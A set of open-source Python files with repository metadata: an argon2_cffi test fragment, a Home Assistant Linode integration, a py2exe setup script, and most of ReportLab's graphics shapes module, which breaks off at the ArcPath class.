salt_len=8,
hash_len=32,
version=19,
memory_cost=65536,
time_cost=2,
parallelism=4,
)
) == (
"Parameters(type=<Type.ID: 2>, version=19, salt_len=8, "
"hash_len=32, time_cost=2, memory_cost=65536, parallelism=4)"
)
| {
"content_hash": "5e9c70f55135bfbdd23555f42161f787",
"timestamp": "",
"source": "github",
"line_count": 142,
"max_line_length": 73,
"avg_line_length": 24.95774647887324,
"alnum_prop": 0.5634875846501128,
"repo_name": "hynek/argon2_cffi",
"id": "ca0d6b683e8f3e91c8c54fdc9ddba8ebf4a2973a",
"size": "3576",
"binary": false,
"copies": "1",
"ref": "refs/heads/main",
"path": "tests/test_utils.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "3366"
},
{
"name": "C",
"bytes": "16143"
},
{
"name": "PowerShell",
"bytes": "7195"
},
{
"name": "Python",
"bytes": "61219"
}
],
"symlink_target": ""
} |
"""
Support for Linode.
For more details about this component, please refer to the documentation at
https://home-assistant.io/components/linode/
"""
import logging
from datetime import timedelta
import voluptuous as vol
from homeassistant.const import CONF_ACCESS_TOKEN
from homeassistant.util import Throttle
import homeassistant.helpers.config_validation as cv
REQUIREMENTS = ['linode-api==4.1.9b1']
_LOGGER = logging.getLogger(__name__)
ATTR_CREATED = 'created'
ATTR_NODE_ID = 'node_id'
ATTR_NODE_NAME = 'node_name'
ATTR_IPV4_ADDRESS = 'ipv4_address'
ATTR_IPV6_ADDRESS = 'ipv6_address'
ATTR_MEMORY = 'memory'
ATTR_REGION = 'region'
ATTR_VCPUS = 'vcpus'
CONF_NODES = 'nodes'
DATA_LINODE = 'data_li'
LINODE_PLATFORMS = ['binary_sensor', 'switch']
DOMAIN = 'linode'
MIN_TIME_BETWEEN_UPDATES = timedelta(seconds=60)
CONFIG_SCHEMA = vol.Schema({
DOMAIN: vol.Schema({
vol.Required(CONF_ACCESS_TOKEN): cv.string,
}),
}, extra=vol.ALLOW_EXTRA)
def setup(hass, config):
"""Set up the Linode component."""
import linode
conf = config[DOMAIN]
access_token = conf.get(CONF_ACCESS_TOKEN)
_linode = Linode(access_token)
try:
_LOGGER.info("Linode Profile %s",
_linode.manager.get_profile().username)
except linode.errors.ApiError as _ex:
_LOGGER.error(_ex)
return False
hass.data[DATA_LINODE] = _linode
return True
class Linode:
"""Handle all communication with the Linode API."""
def __init__(self, access_token):
"""Initialize the Linode connection."""
import linode
self._access_token = access_token
self.data = None
self.manager = linode.LinodeClient(token=self._access_token)
def get_node_id(self, node_name):
"""Get the status of a Linode Instance."""
import linode
node_id = None
try:
all_nodes = self.manager.linode.get_instances()
for node in all_nodes:
if node_name == node.label:
node_id = node.id
except linode.errors.ApiError as _ex:
_LOGGER.error(_ex)
return node_id
@Throttle(MIN_TIME_BETWEEN_UPDATES)
def update(self):
"""Use the data from Linode API."""
import linode
try:
self.data = self.manager.linode.get_instances()
except linode.errors.ApiError as _ex:
_LOGGER.error(_ex)
| {
"content_hash": "02d91049672a8f0b729e48a1393c1284",
"timestamp": "",
"source": "github",
"line_count": 98,
"max_line_length": 75,
"avg_line_length": 24.908163265306122,
"alnum_prop": 0.6366243342892257,
"repo_name": "persandstrom/home-assistant",
"id": "c98ef16c7ed6672c6b730f708ce56816169f2faa",
"size": "2441",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "homeassistant/components/linode.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Dockerfile",
"bytes": "1067"
},
{
"name": "Python",
"bytes": "11745210"
},
{
"name": "Ruby",
"bytes": "518"
},
{
"name": "Shell",
"bytes": "16652"
}
],
"symlink_target": ""
} |
from distutils.core import setup
import py2exe
setup(console=['mappy.py']) | {
"content_hash": "86867d46e7a853371a07dd18f8f322d7",
"timestamp": "",
"source": "github",
"line_count": 4,
"max_line_length": 32,
"avg_line_length": 18.75,
"alnum_prop": 0.7866666666666666,
"repo_name": "kevinzhou96/15-112-Term-Project",
"id": "fdbb07f865107dd08b0f1261cc83bc8021bb7dc9",
"size": "75",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "Python/setup.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "53857"
}
],
"symlink_target": ""
} |
"""
core of the graphics library - defines Drawing and Shapes
"""
__version__=''' $Id: shapes.py 3089 2007-05-23 11:45:58Z rgbecker $ '''
import string, os, sys
from math import pi, cos, sin, tan
from types import FloatType, IntType, ListType, TupleType, StringType, InstanceType
from pprint import pprint
from reportlab.platypus import Flowable
from reportlab.rl_config import shapeChecking, verbose, defaultGraphicsFontName, _unset_
from reportlab.lib import logger
from reportlab.lib import colors
from reportlab.lib.validators import *
from reportlab.lib.attrmap import *
from reportlab.lib.utils import fp_str
from reportlab.pdfbase.pdfmetrics import stringWidth
class NotImplementedError(Exception):
pass
# two constants for filling rules
NON_ZERO_WINDING = 'Non-Zero Winding'
EVEN_ODD = 'Even-Odd'
## these can be overridden at module level before you start
#creating shapes. So, if using a special color model,
#this provides support for the rendering mechanism.
#you can change defaults globally before you start
#making shapes; one use is to substitute another
#color model cleanly throughout the drawing.
STATE_DEFAULTS = { # sensible defaults for all
'transform': (1,0,0,1,0,0),
# styles follow SVG naming
'strokeColor': colors.black,
'strokeWidth': 1,
'strokeLineCap': 0,
'strokeLineJoin': 0,
'strokeMiterLimit' : 'TBA', # don't know yet so let bomb here
'strokeDashArray': None,
'strokeOpacity': 1.0, #100%
'fillColor': colors.black, #...or text will be invisible
#'fillRule': NON_ZERO_WINDING, - these can be done later
#'fillOpacity': 1.0, #100% - can be done later
'fontSize': 10,
'fontName': defaultGraphicsFontName,
'textAnchor': 'start' # can be start, middle, end, inherited
}
####################################################################
# math utilities. These could probably be moved into lib
# somewhere.
####################################################################
# constructors for matrices:
def nullTransform():
return (1, 0, 0, 1, 0, 0)
def translate(dx, dy):
return (1, 0, 0, 1, dx, dy)
def scale(sx, sy):
return (sx, 0, 0, sy, 0, 0)
def rotate(angle):
a = angle * pi/180
return (cos(a), sin(a), -sin(a), cos(a), 0, 0)
def skewX(angle):
a = angle * pi/180
return (1, 0, tan(a), 1, 0, 0)
def skewY(angle):
a = angle * pi/180
return (1, tan(a), 0, 1, 0, 0)
def mmult(A, B):
"A postmultiplied by B"
# I checked this RGB
# [a0 a2 a4] [b0 b2 b4]
# [a1 a3 a5] * [b1 b3 b5]
# [ 1 ] [ 1 ]
#
return (A[0]*B[0] + A[2]*B[1],
A[1]*B[0] + A[3]*B[1],
A[0]*B[2] + A[2]*B[3],
A[1]*B[2] + A[3]*B[3],
A[0]*B[4] + A[2]*B[5] + A[4],
A[1]*B[4] + A[3]*B[5] + A[5])
def inverse(A):
"For A affine 2D represented as 6vec return 6vec version of A**(-1)"
# I checked this RGB
det = float(A[0]*A[3] - A[2]*A[1])
R = [A[3]/det, -A[1]/det, -A[2]/det, A[0]/det]
return tuple(R+[-R[0]*A[4]-R[2]*A[5],-R[1]*A[4]-R[3]*A[5]])
def zTransformPoint(A,v):
"Apply the homogenous part of atransformation a to vector v --> A*v"
return (A[0]*v[0]+A[2]*v[1],A[1]*v[0]+A[3]*v[1])
def transformPoint(A,v):
"Apply transformation a to vector v --> A*v"
return (A[0]*v[0]+A[2]*v[1]+A[4],A[1]*v[0]+A[3]*v[1]+A[5])
def transformPoints(matrix, V):
return map(transformPoint, V)
def zTransformPoints(matrix, V):
return map(lambda x,matrix=matrix: zTransformPoint(matrix,x), V)
def _textBoxLimits(text, font, fontSize, leading, textAnchor, boxAnchor):
w = 0
for t in text:
w = max(w,stringWidth(t,font, fontSize))
h = len(text)*leading
yt = fontSize
if boxAnchor[0]=='s':
yb = -h
yt = yt - h
elif boxAnchor[0]=='n':
yb = 0
else:
yb = -h/2.0
yt = yt + yb
if boxAnchor[-1]=='e':
xb = -w
if textAnchor=='end': xt = 0
elif textAnchor=='start': xt = -w
else: xt = -w/2.0
elif boxAnchor[-1]=='w':
xb = 0
if textAnchor=='end': xt = w
elif textAnchor=='start': xt = 0
else: xt = w/2.0
else:
xb = -w/2.0
if textAnchor=='end': xt = -xb
elif textAnchor=='start': xt = xb
else: xt = 0
return xb, yb, w, h, xt, yt
def _rotatedBoxLimits( x, y, w, h, angle):
'''
Find the corner points of the rotated w x h sized box at x,y
return the corner points and the min max points in the original space
'''
C = zTransformPoints(rotate(angle),((x,y),(x+w,y),(x+w,y+h),(x,y+h)))
X = map(lambda x: x[0], C)
Y = map(lambda x: x[1], C)
return min(X), max(X), min(Y), max(Y), C
class _DrawTimeResizeable:
'''Addin class to provide the horribleness of _drawTimeResize'''
def _drawTimeResize(self,w,h):
if hasattr(self,'_canvas'):
canvas = self._canvas
drawing = canvas._drawing
drawing.width, drawing.height = w, h
if hasattr(canvas,'_drawTimeResize'):
canvas._drawTimeResize(w,h)
class _SetKeyWordArgs:
def __init__(self, keywords={}):
"""In general properties may be supplied to the constructor."""
for key, value in keywords.items():
setattr(self, key, value)
#################################################################
#
# Helper functions for working out bounds
#
#################################################################
def getRectsBounds(rectList):
# filter out any None objects, e.g. empty groups
L = filter(lambda x: x is not None, rectList)
if not L: return None
xMin, yMin, xMax, yMax = L[0]
for (x1, y1, x2, y2) in L[1:]:
if x1 < xMin:
xMin = x1
if x2 > xMax:
xMax = x2
if y1 < yMin:
yMin = y1
if y2 > yMax:
yMax = y2
return (xMin, yMin, xMax, yMax)
def getPathBounds(points):
n = len(points)
f = lambda i,p = points: p[i]
xs = map(f,xrange(0,n,2))
ys = map(f,xrange(1,n,2))
return (min(xs), min(ys), max(xs), max(ys))
def getPointsBounds(pointList):
"Helper function for list of points"
first = pointList[0]
if type(first) in (ListType, TupleType):
xs = map(lambda xy: xy[0],pointList)
ys = map(lambda xy: xy[1],pointList)
return (min(xs), min(ys), max(xs), max(ys))
else:
return getPathBounds(pointList)
#################################################################
#
# And now the shapes themselves....
#
#################################################################
class Shape(_SetKeyWordArgs,_DrawTimeResizeable):
"""Base class for all nodes in the tree. Nodes are simply
packets of data to be created, stored, and ultimately
rendered - they don't do anything active. They provide
convenience methods for verification but do not
check attribiute assignments or use any clever setattr
tricks this time."""
_attrMap = AttrMap()
def copy(self):
"""Return a clone of this shape."""
# implement this in the descendants as they need the right init methods.
raise NotImplementedError, "No copy method implemented for %s" % self.__class__.__name__
def getProperties(self,recur=1):
"""Interface to make it easy to extract automatic
documentation"""
#basic nodes have no children so this is easy.
#for more complex objects like widgets you
#may need to override this.
props = {}
for key, value in self.__dict__.items():
if key[0:1] <> '_':
props[key] = value
return props
def setProperties(self, props):
"""Supports the bulk setting if properties from,
for example, a GUI application or a config file."""
self.__dict__.update(props)
#self.verify()
def dumpProperties(self, prefix=""):
"""Convenience. Lists them on standard output. You
may provide a prefix - mostly helps to generate code
samples for documentation."""
propList = self.getProperties().items()
propList.sort()
if prefix:
prefix = prefix + '.'
for (name, value) in propList:
print '%s%s = %s' % (prefix, name, value)
def verify(self):
"""If the programmer has provided the optional
_attrMap attribute, this checks all expected
attributes are present; no unwanted attributes
are present; and (if a checking function is found)
checks each attribute. Either succeeds or raises
an informative exception."""
if self._attrMap is not None:
for key in self.__dict__.keys():
if key[0] <> '_':
assert self._attrMap.has_key(key), "Unexpected attribute %s found in %s" % (key, self)
for (attr, metavalue) in self._attrMap.items():
assert hasattr(self, attr), "Missing attribute %s from %s" % (attr, self)
value = getattr(self, attr)
assert metavalue.validate(value), "Invalid value %s for attribute %s in class %s" % (value, attr, self.__class__.__name__)
if shapeChecking:
"""This adds the ability to check every attribute assignment as it is made.
It slows down shapes but is a big help when developing. It does not
get defined if rl_config.shapeChecking = 0"""
def __setattr__(self, attr, value):
"""By default we verify. This could be off
in some parallel base classes."""
validateSetattr(self,attr,value) #from reportlab.lib.attrmap
def getBounds(self):
"Returns bounding rectangle of object as (x1,y1,x2,y2)"
raise NotImplementedError("Shapes and widgets must implement getBounds")
class Group(Shape):
"""Groups elements together. May apply a transform
to its contents. Has a publicly accessible property
'contents' which may be used to iterate over contents.
In addition, child nodes may be given a name in which
case they are subsequently accessible as properties."""
_attrMap = AttrMap(
transform = AttrMapValue(isTransform,desc="Coordinate transformation to apply"),
contents = AttrMapValue(isListOfShapes,desc="Contained drawable elements"),
)
def __init__(self, *elements, **keywords):
"""Initial lists of elements may be provided to allow
compact definitions in literal Python code. May or
may not be useful."""
# Groups need _attrMap to be an instance rather than
# a class attribute, as it may be extended at run time.
self._attrMap = self._attrMap.clone()
self.contents = []
self.transform = (1,0,0,1,0,0)
for elt in elements:
self.add(elt)
# this just applies keywords; do it at the end so they
#don;t get overwritten
_SetKeyWordArgs.__init__(self, keywords)
def _addNamedNode(self,name,node):
'if name is not None add an attribute pointing to node and add to the attrMap'
if name:
if name not in self._attrMap.keys():
self._attrMap[name] = AttrMapValue(isValidChild)
setattr(self, name, node)
def add(self, node, name=None):
"""Appends non-None child node to the 'contents' attribute. In addition,
if a name is provided, it is subsequently accessible by name
"""
# propagates properties down
if node is not None:
assert isValidChild(node), "Can only add Shape or UserNode objects to a Group"
self.contents.append(node)
self._addNamedNode(name,node)
def _nn(self,node):
self.add(node)
return self.contents[-1]
def insert(self, i, n, name=None):
'Inserts sub-node n in contents at specified location'
if n is not None:
assert isValidChild(n), "Can only insert Shape or UserNode objects in a Group"
if i<0:
self.contents[i:i] =[n]
else:
self.contents.insert(i,n)
self._addNamedNode(name,n)
def expandUserNodes(self):
"""Return a new object which only contains primitive shapes."""
# many limitations - shared nodes become multiple ones,
obj = isinstance(self,Drawing) and Drawing(self.width,self.height) or Group()
obj._attrMap = self._attrMap.clone()
if hasattr(obj,'transform'): obj.transform = self.transform[:]
self_contents = self.contents
a = obj.contents.append
for child in self_contents:
if isinstance(child, UserNode):
newChild = child.provideNode()
elif isinstance(child, Group):
newChild = child.expandUserNodes()
else:
newChild = child.copy()
a(newChild)
self._copyNamedContents(obj)
return obj
def _explode(self):
''' return a fully expanded object'''
from reportlab.graphics.widgetbase import Widget
obj = Group()
if hasattr(obj,'transform'): obj.transform = self.transform[:]
P = self.contents[:] # pending nodes
while P:
n = P.pop(0)
if isinstance(n, UserNode):
P.append(n.provideNode())
elif isinstance(n, Group):
n = n._explode()
if n.transform==(1,0,0,1,0,0):
obj.contents.extend(n.contents)
else:
obj.add(n)
else:
obj.add(n)
return obj
def _copyContents(self,obj):
for child in self.contents:
obj.contents.append(child)
def _copyNamedContents(self,obj,aKeys=None,noCopy=('contents',)):
from copy import copy
self_contents = self.contents
if not aKeys: aKeys = self._attrMap.keys()
for (k, v) in self.__dict__.items():
if v in self_contents:
pos = self_contents.index(v)
setattr(obj, k, obj.contents[pos])
elif k in aKeys and k not in noCopy:
setattr(obj, k, copy(v))
def _copy(self,obj):
"""copies to obj"""
obj._attrMap = self._attrMap.clone()
self._copyContents(obj)
self._copyNamedContents(obj)
return obj
def copy(self):
"""returns a copy"""
return self._copy(self.__class__())
def rotate(self, theta):
"""Convenience to help you set transforms"""
self.transform = mmult(self.transform, rotate(theta))
def translate(self, dx, dy):
"""Convenience to help you set transforms"""
self.transform = mmult(self.transform, translate(dx, dy))
def scale(self, sx, sy):
"""Convenience to help you set transforms"""
self.transform = mmult(self.transform, scale(sx, sy))
def skew(self, kx, ky):
"""Convenience to help you set transforms"""
self.transform = mmult(mmult(self.transform, skewX(kx)),skewY(ky))
def shift(self, x, y):
'''Convenience function to set the origin arbitrarily'''
self.transform = self.transform[:-2]+(x,y)
def asDrawing(self, width, height):
""" Convenience function to make a drawing from a group
After calling this the instance will be a drawing!
"""
self.__class__ = Drawing
self._attrMap.update(self._xtraAttrMap)
self.width = width
self.height = height
def getContents(self):
'''Return the list of things to be rendered
override to get more complicated behaviour'''
b = getattr(self,'background',None)
C = self.contents
if b and b not in C: C = [b]+C
return C
def getBounds(self):
if self.contents:
b = []
for elem in self.contents:
b.append(elem.getBounds())
x1 = getRectsBounds(b)
if x1 is None: return None
x1, y1, x2, y2 = x1
trans = self.transform
corners = [[x1,y1], [x1, y2], [x2, y1], [x2,y2]]
newCorners = []
for corner in corners:
newCorners.append(transformPoint(trans, corner))
return getPointsBounds(newCorners)
else:
#empty group needs a sane default; this
#will happen when interactively creating a group
#nothing has been added to yet. The alternative is
#to handle None as an allowed return value everywhere.
return None
def _addObjImport(obj,I,n=None):
'''add an import of obj's class to a dictionary of imports''' #'
from inspect import getmodule
c = obj.__class__
m = getmodule(c).__name__
n = n or c.__name__
if not I.has_key(m):
I[m] = [n]
elif n not in I[m]:
I[m].append(n)
def _repr(self,I=None):
'''return a repr style string with named fixed args first, then keywords'''
if type(self) is InstanceType:
if self is EmptyClipPath:
_addObjImport(self,I,'EmptyClipPath')
return 'EmptyClipPath'
if I: _addObjImport(self,I)
if isinstance(self,Shape):
from inspect import getargs
args, varargs, varkw = getargs(self.__init__.im_func.func_code)
P = self.getProperties()
s = self.__class__.__name__+'('
for n in args[1:]:
v = P[n]
del P[n]
s = s + '%s,' % _repr(v,I)
for n,v in P.items():
v = P[n]
s = s + '%s=%s,' % (n, _repr(v,I))
return s[:-1]+')'
else:
return repr(self)
elif type(self) is FloatType:
return fp_str(self)
elif type(self) in (ListType,TupleType):
s = ''
for v in self:
s = s + '%s,' % _repr(v,I)
if type(self) is ListType:
return '[%s]' % s[:-1]
else:
return '(%s%s)' % (s[:-1],len(self)==1 and ',' or '')
else:
return repr(self)
def _renderGroupPy(G,pfx,I,i=0,indent='\t\t'):
s = ''
C = getattr(G,'transform',None)
if C: s = s + ('%s%s.transform = %s\n' % (indent,pfx,_repr(C)))
C = G.contents
for n in C:
if isinstance(n, Group):
npfx = 'v%d' % i
i = i + 1
s = s + '%s%s=%s._nn(Group())\n' % (indent,npfx,pfx)
s = s + _renderGroupPy(n,npfx,I,i,indent)
i = i - 1
else:
s = s + '%s%s.add(%s)\n' % (indent,pfx,_repr(n,I))
return s
def _extraKW(self,pfx,**kw):
kw.update(self.__dict__)
R = {}
n = len(pfx)
for k in kw.keys():
if k.startswith(pfx):
R[k[n:]] = kw[k]
return R
class Drawing(Group, Flowable):
"""Outermost container; the thing a renderer works on.
This has no properties except a height, width and list
of contents."""
_saveModes=(
'pdf','ps','eps','gif','png','jpg','jpeg','pct',
'pict','tiff','tif','py','bmp','svg','tiffp',
)
_xtraAttrMap = AttrMap(
width = AttrMapValue(isNumber,desc="Drawing width in points."),
height = AttrMapValue(isNumber,desc="Drawing height in points."),
canv = AttrMapValue(None),
background = AttrMapValue(isValidChildOrNone,desc="Background widget for the drawing"),
hAlign = AttrMapValue(OneOf("LEFT", "RIGHT", "CENTER", "CENTRE"), desc="Horizontal alignment within parent document"),
vAlign = AttrMapValue(OneOf("TOP", "BOTTOM", "CENTER", "CENTRE"), desc="Vertical alignment within parent document"),
#AR temporary hack to track back up.
#fontName = AttrMapValue(isStringOrNone),
renderScale = AttrMapValue(isNumber,desc="Global scaling for rendering"),
)
_attrMap = AttrMap(BASE=Group)
_attrMap.update(_xtraAttrMap)
def __init__(self, width=400, height=200, *nodes, **keywords):
self.background = None
apply(Group.__init__,(self,)+nodes,keywords)
self.width = width
self.height = height
self.hAlign = 'LEFT'
self.vAlign = 'BOTTOM'
self.renderScale = 1.0
def _renderPy(self):
I = {'reportlab.graphics.shapes': ['_DrawingEditorMixin','Drawing','Group']}
G = _renderGroupPy(self._explode(),'self',I)
n = 'ExplodedDrawing_' + self.__class__.__name__
s = '#Autogenerated by ReportLab guiedit do not edit\n'
for m, o in I.items():
s = s + 'from %s import %s\n' % (m,string.replace(str(o)[1:-1],"'",""))
s = s + '\nclass %s(_DrawingEditorMixin,Drawing):\n' % n
s = s + '\tdef __init__(self,width=%s,height=%s,*args,**kw):\n' % (self.width,self.height)
s = s + '\t\tapply(Drawing.__init__,(self,width,height)+args,kw)\n'
s = s + G
s = s + '\n\nif __name__=="__main__": #NORUNTESTS\n\t%s().save(formats=[\'pdf\'],outDir=\'.\',fnRoot=None)\n' % n
return s
def draw(self,showBoundary=_unset_):
"""This is used by the Platypus framework to let the document
draw itself in a story. It is specific to PDF and should not
be used directly."""
import renderPDF
renderPDF.draw(self, self.canv, 0, 0, showBoundary=showBoundary)
def wrap(self, availWidth, availHeight):
width = self.width
height = self.height
renderScale = self.renderScale
if renderScale!=1.0:
width *= renderScale
height *= renderScale
return width, height
def expandUserNodes(self):
"""Return a new drawing which only contains primitive shapes."""
obj = Group.expandUserNodes(self)
obj.width = self.width
obj.height = self.height
return obj
def copy(self):
"""Returns a copy"""
return self._copy(self.__class__(self.width, self.height))
def asGroup(self,*args,**kw):
return self._copy(apply(Group,args,kw))
def save(self, formats=None, verbose=None, fnRoot=None, outDir=None, title='', **kw):
"""Saves copies of self in desired location and formats.
Multiple formats can be supported in one call
the extra keywords can be of the form
_renderPM_dpi=96 (which passes dpi=96 to renderPM)
"""
from reportlab import rl_config
ext = ''
if not fnRoot:
fnRoot = getattr(self,'fileNamePattern',(self.__class__.__name__+'%03d'))
chartId = getattr(self,'chartId',0)
if callable(fnRoot):
fnRoot = fnRoot(chartId)
else:
try:
fnRoot = fnRoot % getattr(self,'chartId',0)
except TypeError, err:
#the exact error message changed from 2.2 to 2.3 so we need to
#check a substring
if str(err).find('not all arguments converted') < 0: raise
if os.path.isabs(fnRoot):
outDir, fnRoot = os.path.split(fnRoot)
else:
outDir = outDir or getattr(self,'outDir','.')
outDir = outDir.rstrip().rstrip(os.sep)
if not outDir: outDir = '.'
if not os.path.isabs(outDir): outDir = os.path.join(getattr(self,'_override_CWD',os.path.dirname(sys.argv[0])),outDir)
if not os.path.isdir(outDir): os.makedirs(outDir)
fnroot = os.path.normpath(os.path.join(outDir,fnRoot))
plotMode = os.path.splitext(fnroot)
if string.lower(plotMode[1][1:]) in self._saveModes:
fnroot = plotMode[0]
plotMode = map(str.lower,formats or getattr(self,'formats',['pdf']))
verbose = (verbose is not None and (verbose,) or (getattr(self,'verbose',verbose),))[0]
_saved = logger.warnOnce.enabled, logger.infoOnce.enabled
logger.warnOnce.enabled = logger.infoOnce.enabled = verbose
if 'pdf' in plotMode:
from reportlab.graphics import renderPDF
filename = fnroot+'.pdf'
if verbose: print "generating PDF file %s" % filename
renderPDF.drawToFile(self, filename, title, showBoundary=getattr(self,'showBorder',rl_config.showBoundary),**_extraKW(self,'_renderPDF_',**kw))
ext = ext + '/.pdf'
if sys.platform=='mac':
import macfs, macostools
macfs.FSSpec(filename).SetCreatorType("CARO", "PDF ")
macostools.touched(filename)
for bmFmt in ['gif','png','tif','jpg','tiff','pct','pict', 'bmp','tiffp']:
if bmFmt in plotMode:
from reportlab.graphics import renderPM
filename = '%s.%s' % (fnroot,bmFmt)
if verbose: print "generating %s file %s" % (bmFmt,filename)
renderPM.drawToFile(self, filename,fmt=bmFmt,showBoundary=getattr(self,'showBorder',rl_config.showBoundary),**_extraKW(self,'_renderPM_',**kw))
ext = ext + '/.' + bmFmt
if 'eps' in plotMode:
try:
from rlextra.graphics import renderPS_SEP as renderPS
except ImportError:
from reportlab.graphics import renderPS
filename = fnroot+'.eps'
if verbose: print "generating EPS file %s" % filename
renderPS.drawToFile(self,
filename,
title = fnroot,
dept = getattr(self,'EPS_info',['Testing'])[0],
company = getattr(self,'EPS_info',['','ReportLab'])[1],
preview = getattr(self,'preview',rl_config.eps_preview),
showBoundary=getattr(self,'showBorder',rl_config.showBoundary),
ttf_embed=getattr(self,'ttf_embed',rl_config.eps_ttf_embed),
**_extraKW(self,'_renderPS_',**kw))
ext = ext + '/.eps'
if 'svg' in plotMode:
from reportlab.graphics import renderSVG
filename = fnroot+'.svg'
if verbose: print "generating EPS file %s" % filename
renderSVG.drawToFile(self,
filename,
showBoundary=getattr(self,'showBorder',rl_config.showBoundary),**_extraKW(self,'_renderSVG_',**kw))
ext = ext + '/.svg'
if 'ps' in plotMode:
from reportlab.graphics import renderPS
filename = fnroot+'.ps'
if verbose: print "generating EPS file %s" % filename
renderPS.drawToFile(self, filename, showBoundary=getattr(self,'showBorder',rl_config.showBoundary),**_extraKW(self,'_renderPS_',**kw))
ext = ext + '/.ps'
if 'py' in plotMode:
filename = fnroot+'.py'
if verbose: print "generating py file %s" % filename
open(filename,'w').write(self._renderPy())
ext = ext + '/.py'
logger.warnOnce.enabled, logger.infoOnce.enabled = _saved
if hasattr(self,'saveLogger'):
self.saveLogger(fnroot,ext)
return ext and fnroot+ext[1:] or ''
def asString(self, format, verbose=None, preview=0):
"""Converts to an 8 bit string in given format."""
assert format in ['pdf','ps','eps','gif','png','jpg','jpeg','bmp','ppm','tiff','tif','py','pict','pct','tiffp'], 'Unknown file format "%s"' % format
from reportlab import rl_config
#verbose = verbose is not None and (verbose,) or (getattr(self,'verbose',verbose),)[0]
if format == 'pdf':
from reportlab.graphics import renderPDF
return renderPDF.drawToString(self)
elif format in ['gif','png','tif','tiff','jpg','pct','pict','bmp','ppm','tiffp']:
from reportlab.graphics import renderPM
return renderPM.drawToString(self, fmt=format)
elif format == 'eps':
try:
from rlextra.graphics import renderPS_SEP as renderPS
except ImportError:
from reportlab.graphics import renderPS
return renderPS.drawToString(self,
preview = preview,
showBoundary=getattr(self,'showBorder',rl_config.showBoundary))
elif format == 'ps':
from reportlab.graphics import renderPS
return renderPS.drawToString(self, showBoundary=getattr(self,'showBorder',rl_config.showBoundary))
elif format == 'py':
return self._renderPy()
class _DrawingEditorMixin:
'''This is a mixin to provide functionality for edited drawings'''
def _add(self,obj,value,name=None,validate=None,desc=None,pos=None):
'''
effectively setattr(obj,name,value), but takes care of things with _attrMaps etc
'''
ivc = isValidChild(value)
if name and hasattr(obj,'_attrMap'):
if not obj.__dict__.has_key('_attrMap'):
obj._attrMap = obj._attrMap.clone()
if ivc and validate is None: validate = isValidChild
obj._attrMap[name] = AttrMapValue(validate,desc)
if hasattr(obj,'add') and ivc:
if pos:
obj.insert(pos,value,name)
else:
obj.add(value,name)
elif name:
setattr(obj,name,value)
else:
raise ValueError, "Can't add, need name"
class LineShape(Shape):
# base for types of lines
_attrMap = AttrMap(
strokeColor = AttrMapValue(isColorOrNone),
strokeWidth = AttrMapValue(isNumber),
strokeLineCap = AttrMapValue(None),
strokeLineJoin = AttrMapValue(None),
strokeMiterLimit = AttrMapValue(isNumber),
strokeDashArray = AttrMapValue(isListOfNumbersOrNone),
)
def __init__(self, kw):
self.strokeColor = STATE_DEFAULTS['strokeColor']
self.strokeWidth = 1
self.strokeLineCap = 0
self.strokeLineJoin = 0
self.strokeMiterLimit = 0
self.strokeDashArray = None
self.setProperties(kw)
class Line(LineShape):
_attrMap = AttrMap(BASE=LineShape,
x1 = AttrMapValue(isNumber),
y1 = AttrMapValue(isNumber),
x2 = AttrMapValue(isNumber),
y2 = AttrMapValue(isNumber),
)
def __init__(self, x1, y1, x2, y2, **kw):
LineShape.__init__(self, kw)
self.x1 = x1
self.y1 = y1
self.x2 = x2
self.y2 = y2
def getBounds(self):
"Returns bounding rectangle of object as (x1,y1,x2,y2)"
return (self.x1, self.y1, self.x2, self.y2)
class SolidShape(LineShape):
# base for anything with outline and content
_attrMap = AttrMap(BASE=LineShape,
fillColor = AttrMapValue(isColorOrNone),
)
def __init__(self, kw):
self.fillColor = STATE_DEFAULTS['fillColor']
# do this at the end so keywords overwrite
#the above settings
LineShape.__init__(self, kw)
# path operator constants
_MOVETO, _LINETO, _CURVETO, _CLOSEPATH = range(4)
_PATH_OP_ARG_COUNT = (2, 2, 6, 0) # [moveTo, lineTo, curveTo, closePath]
_PATH_OP_NAMES=['moveTo','lineTo','curveTo','closePath']
def _renderPath(path, drawFuncs):
"""Helper function for renderers."""
# this could be a method of Path...
points = path.points
i = 0
hadClosePath = 0
hadMoveTo = 0
for op in path.operators:
nArgs = _PATH_OP_ARG_COUNT[op]
func = drawFuncs[op]
j = i + nArgs
apply(func, points[i:j])
i = j
if op == _CLOSEPATH:
hadClosePath = hadClosePath + 1
if op == _MOVETO:
hadMoveTo = hadMoveTo + 1
return hadMoveTo == hadClosePath
class Path(SolidShape):
"""Path, made up of straight lines and bezier curves."""
_attrMap = AttrMap(BASE=SolidShape,
points = AttrMapValue(isListOfNumbers),
operators = AttrMapValue(isListOfNumbers),
isClipPath = AttrMapValue(isBoolean),
)
def __init__(self, points=None, operators=None, isClipPath=0, **kw):
SolidShape.__init__(self, kw)
if points is None:
points = []
if operators is None:
operators = []
assert len(points) % 2 == 0, 'Point list must have even number of elements!'
self.points = points
self.operators = operators
self.isClipPath = isClipPath
def copy(self):
new = self.__class__(self.points[:], self.operators[:])
new.setProperties(self.getProperties())
return new
def moveTo(self, x, y):
self.points.extend([x, y])
self.operators.append(_MOVETO)
def lineTo(self, x, y):
self.points.extend([x, y])
self.operators.append(_LINETO)
def curveTo(self, x1, y1, x2, y2, x3, y3):
self.points.extend([x1, y1, x2, y2, x3, y3])
self.operators.append(_CURVETO)
def closePath(self):
self.operators.append(_CLOSEPATH)
def getBounds(self):
return getPathBounds(self.points)
EmptyClipPath=Path() #special path
def getArcPoints(centerx, centery, radius, startangledegrees, endangledegrees, yradius=None, degreedelta=None, reverse=None):
if yradius is None: yradius = radius
points = []
from math import sin, cos, pi
degreestoradians = pi/180.0
startangle = startangledegrees*degreestoradians
endangle = endangledegrees*degreestoradians
while endangle<startangle:
endangle = endangle+2*pi
angle = float(endangle - startangle)
a = points.append
if angle>.001:
degreedelta = min(angle,degreedelta or 1.)
radiansdelta = degreedelta*degreestoradians
n = max(int(angle/radiansdelta+0.5),1)
radiansdelta = angle/n
n += 1
else:
n = 1
radiansdelta = 0
for angle in xrange(n):
angle = startangle+angle*radiansdelta
a((centerx+radius*cos(angle),centery+yradius*sin(angle)))
if reverse: points.reverse()
return points
class ArcPath(Path):
'''Path with an addArc method'''
